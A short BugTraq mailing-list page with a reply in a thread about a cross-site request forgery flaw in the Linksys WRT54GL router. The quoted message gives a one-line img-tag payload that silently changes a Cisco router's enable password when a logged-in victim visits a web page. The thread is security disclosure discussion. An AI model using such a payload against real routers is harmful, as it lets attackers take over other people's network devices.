BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Re: Linksys WRT54 GL - Session riding (CSRF) Jan 14 2008 05:31PM
J. Oquendo (sil infiltrated net)

> | Isn't your exploit somewhat complicated? Just put
> |
> | <img
> src="http://192.0.2.1/level/15/configure/-/enable/secret/mypassword"/>
> |
> | on a web page, and trick the victim to visit it while he or she is
> | logged into the Cisco router at 192.0.2.1 over HTTP. This has been
> | dubbe...

[ more ]  
 

Privacy Statement
Copyright 2010, SecurityFocus